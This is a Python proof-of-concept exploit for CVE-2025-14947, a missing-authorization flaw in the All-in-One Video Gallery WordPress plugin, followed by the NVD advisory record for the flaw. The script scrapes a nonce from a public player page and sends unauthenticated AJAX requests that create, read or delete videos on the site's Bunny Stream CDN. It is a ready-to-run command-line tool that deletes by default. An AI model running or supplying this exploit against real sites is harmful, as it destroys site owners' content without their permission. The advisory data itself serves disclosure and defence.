CVE-2025-14947

import requests import re import argparse def exploit_cve_2025_14947(target_url, action='delete'): """ CVE-2025-14947 PoC - All-in-One Video Gallery Unauthorized Video Manipulation This exploit demonstrates the IDOR vulnerability in All-in-One Video Gallery plugin where AJAX functions lack proper capability checks. Actions: 'create', 'get', 'delete' """ # Step 1: Extract nonce from public player template player_url = f"{target_url}/?aivg_id=1" try: response = requests.get(player_url, timeout=10) # Extract nonce from player template (typically in data-nonce attribute) nonce_match = re.search(r'data-nonce="([a-zA-Z0-9]+)"', response.text) if not nonce_match: print("[-] Failed to extract nonce from player template") return False nonce = nonce_match.group(1) print(f"[+] Extracted nonce: {nonce}") except requests.RequestException as e: print(f"[-] Error fetching player page: {e}") return False # Step 2: Prepare AJAX request ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } if action == 'create': # Create video on Bunny Stream CDN data = { 'action': 'ajax_callback_create_bunny_stream_video', 'nonce': nonce, 'video_title': 'Malicious Video', 'video_guid': 'malicious-video-guid' } elif action == 'get': # Get video information data = { 'action': 'ajax_callback_get_bunny_stream_video', 'nonce': nonce, 'video_id': '1' } elif action == 'delete': # Delete video from Bunny Stream CDN data = { 'action': 'ajax_callback_delete_bunny_stream_video', 'nonce': nonce, 'video_id': '1' } else: print("[-] Invalid action") return False # Step 3: Execute malicious request (no authentication required) try: response = requests.post(ajax_endpoint, data=data, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] {action.upper()} action completed successfully") print(f"[+] Response: {response.text[:500]}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.RequestException as e: print(f"[-] Error executing request: {e}") return False if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-14947 Exploit') parser.add_argument('--url', required=True, help='Target WordPress URL') parser.add_argument('--action', choices=['create', 'get', 'delete'], default='delete', help='Action to perform') args = parser.parse_args() exploit_cve_2025_14947(args.url, args.action)

{"cve": {"id": "CVE-2025-14947", "sourceIdentifier": "[email protected]", "published": "2026-01-23T18:16:02.070", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The All-in-One Video Gallery plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `ajax_callback_create_bunny_stream_video`, `ajax_callback_get_bunny_stream_video`, and `ajax_callback_delete_bunny_stream_video` functions in all versions up to, and including, 4.6.4. This makes it possible for unauthenticated attackers to create and delete videos on the Bunny Stream CDN associated with the victim's account, provided they can obtain a valid nonce which is exposed in public player templates."}, {"lang": "es", "value": "El plugin All-in-One Video Gallery para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en las funciones 'ajax_callback_create_bunny_stream_video', 'ajax_callback_get_bunny_stream_video' y 'ajax_callback_delete_bunny_stream_video' en todas las versiones hasta la 4.6.4, inclusive. Esto hace posible que atacantes no autenticados creen y eliminen videos en la CDN de Bunny Stream asociada con la cuenta de la víctima, siempre que puedan obtener un nonce válido que se expone en las plantillas públicas del reproductor."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/includes/init.php#L373", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/bunny-stream.php#L131", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/all-in-one-video-gallery/trunk/public/bunny-stream.php#L285", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3441541/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bedfb712-faf6-4131-b254-e6d7c367f49f?source=cve", "source": "[email protected]"}]}}